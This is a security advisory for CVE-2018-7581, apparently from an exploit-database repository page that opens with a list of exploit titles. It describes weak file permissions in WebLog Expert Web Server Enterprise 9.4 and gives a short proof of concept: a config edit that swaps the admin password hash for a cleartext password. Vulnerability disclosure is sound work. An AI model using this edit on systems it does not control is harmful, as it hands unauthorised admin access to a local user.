5947825a84
15 changes to exploits/shellcodes uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 - Range header Denial of Service μTorrent (uTorrent) / BitTorrent WebIU HTTP 1.7.7/6.0.1 - Range header Denial of Service uTorrent 1.8.3 Build 15772 - Create New Torrent Buffer Overflow (PoC) μTorrent (uTorrent) 1.8.3 Build 15772 - Create New Torrent Buffer Overflow (PoC) uTorrent WebUI 0.370 - Authorisation Header Denial of Service μTorrent (uTorrent) WebUI 0.370 - Authorisation Header Denial of Service Memcached - 'memcrashed' Denial of Service Memcached 1.5.5 - 'Memcrashed' Insufficient Control Network Message Volume Denial of Service (2) Memcached 1.5.5 - 'Memcrashed' Insufficient Control Network Message Volume Denial of Service (1) Memcached 1.5.5 - 'Memcrashed ' Insufficient Control of Network Message Volume Denial of Service With Shodan API Broadcom BCM43xx Wi-Fi - 'BroadPWN' Denial of Service WebLog Expert Enterprise 9.4 - Denial of Service uTorrent 2.0.3 - 'plugin_dll.dll' DLL Hijacking μTorrent (uTorrent) 2.0.3 - 'plugin_dll.dll' DLL Hijacking uTorrent 2.0.3 - DLL Hijacking μTorrent (uTorrent) 2.0.3 - DLL Hijacking iSumsoft ZIP Password Refixer 3.1.1 - Buffer Overflow Microsoft Office - 'Composite Moniker Remote Code Execution Mozilla Firefox - Address Bar Spoofing Tor (Firefox 41 < 50) - Code Execution Chrome 35.0.1916.153 - Sandbox Escape / Command Execution WebLog Expert Enterprise 9.4 - Authentication Bypass uTorrent 1.6 build 474 - 'announce' Key Remote Heap Overflow μTorrent (uTorrent) 1.6 build 474 - 'announce' Key Remote Heap Overflow t. hauck jana WebServer 1.0/1.45/1.46 - Directory Traversal T. Hauck Jana Server 1.0/1.45/1.46 - Directory Traversal Oracle WebLogic Server 10.3.6.0.0 / 12.x - Remote Command Execution Werkzeug - 'Debug Shell' Command Execution TikiWiki < 1.9.9 - 'tiki-listmovies.php' Directory Traversal TikiWiki Project < 1.9.9 - 'tiki-listmovies.php' Directory Traversal toronja CMS - SQL Injection Toronja CMS - SQL Injection uTorrent WebUI 0.310 Beta 2 - Cross-Site Request Forgery μTorrent (uTorrent) WebUI 0.310 Beta 2 - Cross-Site Request Forgery tinybrowser - 'tinybrowser.php' Directory Listing tinybrowser - 'edit.php' Directory Listing TinyBrowser - 'tinybrowser.php' Directory Listing TinyBrowser - 'edit.php' Directory Listing Xoops 2.5.7.2 - Directory Traversal Bypass XOOPS 2.5.7.2 - Directory Traversal Bypass SAP BusinessObjects launch pad - Server-Side Request Forgery antMan < 0.9.1a - Authentication Bypass Bacula-Web < 8.0.0-rc2 - SQL Injection
91 lines
No EOL
2.9 KiB
Text
91 lines
No EOL
2.9 KiB
Text
[+] Credits: John Page (aka hyp3rlinx)
|
|
[+] Website: hyp3rlinx.altervista.org
|
|
[+] Source: http://hyp3rlinx.altervista.org/advisories/WEBLOG-EXPERT-WEB-SERVER-ENTERPRISE-v9.4-AUTHENTICATION-BYPASS.txt
|
|
[+] ISR: Apparition Security
|
|
|
|
|
|
Vendor:
|
|
========
|
|
www.weblogexpert.com
|
|
|
|
|
|
Product:
|
|
========
|
|
WebLog Expert Web Server Enterprise v9.4
|
|
|
|
WebLog Expert is a fast and powerful access log analyzer. It will give you information about your site's visitors:
|
|
activity statistics, accessed files, paths through the site, information about referring pages, search engines, browsers,
|
|
operating systems, and more. The program produces easy-to-read reports that include both text information (tables) and charts.
|
|
|
|
|
|
|
|
Vulnerability Type:
|
|
===================
|
|
Authentication Bypass
|
|
|
|
|
|
|
|
CVE Reference:
|
|
==============
|
|
CVE-2018-7581
|
|
|
|
|
|
|
|
Security Issue:
|
|
================
|
|
The "WebServer.cfg" under "ProgramData\WebLog Expert\WebServer\" used by WebLog Expert Web Server Enterprise 9.4
|
|
has weak permissions (BUILTIN\Users:(ID)C), which allows local users to set a cleartext password and login as admin.
|
|
|
|
A standard non Windows Administrator user can edit the 'WebServer.cfg' file under "C:\ProgramData\WebLog Expert\WebServer"
|
|
set to a cleartext password and login as admin.
|
|
|
|
e.g.
|
|
|
|
C:\ProgramData\WebLog Expert\WebServer>cacls * | more
|
|
C:\ProgramData\WebLog Expert\WebServer\WebServer.cfg BUILTIN\Users:(ID)C
|
|
BUILTIN\Administrators:(ID)C
|
|
NT AUTHORITY\SYSTEM:(ID)F
|
|
BUILTIN\Administrators:(ID)F
|
|
|
|
|
|
Exploit/POC:
|
|
=============
|
|
Login as a 'Standard' Windows user
|
|
Comment out the Admin hashed password using ';' then add any cleartext password as follows.
|
|
|
|
[User:admin]
|
|
Password=1234
|
|
;PasswordHash=3413C538CE5234FB194E82AE1F3954FD2BC848C0
|
|
bAllProfiles=1
|
|
|
|
Now login in as Admin! :)
|
|
|
|
|
|
|
|
Network Access:
|
|
===============
|
|
Local
|
|
|
|
|
|
|
|
Severity:
|
|
=========
|
|
Medium
|
|
|
|
|
|
|
|
Disclosure Timeline:
|
|
=============================
|
|
Vendor Notification: March 1, 2018
|
|
No replies from previous attempts
|
|
March 7, 2018 : Public Disclosure
|
|
|
|
|
|
|
|
[+] Disclaimer
|
|
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
|
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
|
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
|
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
|
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
|
or exploits by the author or elsewhere. All content (c). |